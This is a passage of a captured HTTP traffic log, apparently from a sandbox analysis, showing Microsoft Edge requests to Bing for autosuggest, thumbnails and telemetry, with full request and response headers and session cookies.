cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 430
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a3ad28c4818991cc20b3b96ca70
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-GeWO32i3n70qkkd4+71ydfzjfFaK7MfREc0tvV/Bwzc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:58 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306938.7f1d6d4
GET

https://www.bing.com/th?id=OSK.a25ee7a2d3812c3b3e9087b5430f36a0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.a25ee7a2d3812c3b3e9087b5430f36a0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:58 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306938.7f1d9ba
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkwe&cp=6&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkwe&cp=6&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 434
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a3aa0f3408ea585866da3dc0bb4
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-QSnZa9pH9iUIF+ZpfDgaqs/UOHJ1kSXkclNAUj/5XU4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:58 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306938.7f1da00
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A5%2C%20%5C%22GL%5C%22%3A3%2C%20%5C%22IG%5C%22%3A%5C%220D03F80EB8DA493FBFD0E33D08DC7B58%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306929102%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306929139%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22430%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306929268%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%2Cig%3AA037B2EE115C4454A3DBE4C379F93DDF%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306929268%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306929269%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A6%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22A037B2EE115C4454A3DBE4C379F93DDF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306929269%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306929677%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A5%2C%20%5C%22GL%5C%22%3A3%2C%20%5C%22IG%5C%22%3A%5C%220D03F80EB8DA493FBFD0E33D08DC7B58%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306929102%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306929139%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22430%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306929268%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%2Cig%3AA037B2EE115C4454A3DBE4C379F93DDF%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306929268%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306929269%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A6%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22A037B2EE115C4454A3DBE4C379F93DDF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306929269%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306929677%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306939.7f1dd10
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkweb&cp=7&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkweb&cp=7&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306939.7f1dd1b
POST

https://www.bing.com/fd/ls/ls.gif?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306930371}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306930371}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
